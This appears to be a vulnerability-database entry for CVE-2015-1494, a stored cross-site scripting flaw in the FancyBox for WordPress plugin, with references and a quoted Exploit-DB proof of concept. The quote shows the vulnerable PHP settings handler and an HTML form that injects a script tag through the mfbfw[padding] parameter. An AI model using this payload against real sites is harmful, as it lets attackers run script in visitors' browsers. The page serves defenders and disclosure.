CVE-2015-1494
Description
The FancyBox for WordPress plugin before 3.0.3 for WordPress does not properly restrict access, which allows remote attackers to conduct cross-site scripting (XSS) attacks via an mfbfw[*] parameter in an update action to wp-admin/admin-post.php, as demonstrated by the mfbfw[padding] parameter and exploited in the wild in February 2015.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
WordPress Plugin Fancybox 3.0.2 - Persistent Cross-Site Scripting
# Exploit Title: Wordpress plugin Fancybox-for-WordPress Stored XSS
# Exploit Author: NULLpOint7r
# Date: 2015-02-11
# Contact me: seidbenseidok@gmail.com
# Version: 3.0.2
# Download link: https://downloads.wordpress.org/plugin/fancybox-for-wordpress.3.0.2.zip
# Home: http://www.sec4ever.com/home/
vulnerable code [fancybox.php]:
342. if ( isset($_GET['page']) && $_GET['page'] == 'fancybox-for-wordpress' ) {
343.
344. if ( isset($_REQUEST['action']) && 'update' == $_REQUEST['action'] ) {
345.
346. $settings = stripslashes_deep( $_POST['mfbfw'] );
347. $settings = array_map( 'convert_chars', $settings );
348.
349. update_option( 'mfbfw', $settings );
350. wp_safe_redirect( add_query_arg('updated', 'true') );
exploit:
<form method="POST" action="http://127.0.0.1/wp-admin/admin-post.php?page=fancybox-for-wordpress">
<input type="text" name="action" value="update">
<input type="text" name="mfbfw[padding]" value="</script><script>alert(/Owned by someone/)</script>">
<input type="submit" value="Send">
</form>Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| colorlib | fancybox | {"endIncluding":"3.0.2"} | |
References
- http://blog.sucuri.net/2015/02/zero-day-in-the-fancybox-for-wordpress-plugin.html
- http://osvdb.org/show/osvdb/118543
- http://www.exploit-db.com/exploits/36087
- http://www.openwall.com/lists/oss-security/2015/02/05/10
- http://www.securityfocus.com/bid/72506
- https://plugins.trac.wordpress.org/changeset/1082625/
- https://wordpress.org/plugins/fancybox-for-wordpress/changelog/
- https://wordpress.org/support/topic/possible-malware-2
- http://blog.sucuri.net/2015/02/zero-day-in-the-fancybox-for-wordpress-plugin.html
- http://osvdb.org/show/osvdb/118543
- http://www.exploit-db.com/exploits/36087
- http://www.openwall.com/lists/oss-security/2015/02/05/10
- http://www.securityfocus.com/bid/72506
- https://plugins.trac.wordpress.org/changeset/1082625/
- https://wordpress.org/plugins/fancybox-for-wordpress/changelog/
- https://wordpress.org/support/topic/possible-malware-2
CWEs
CWE-79
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.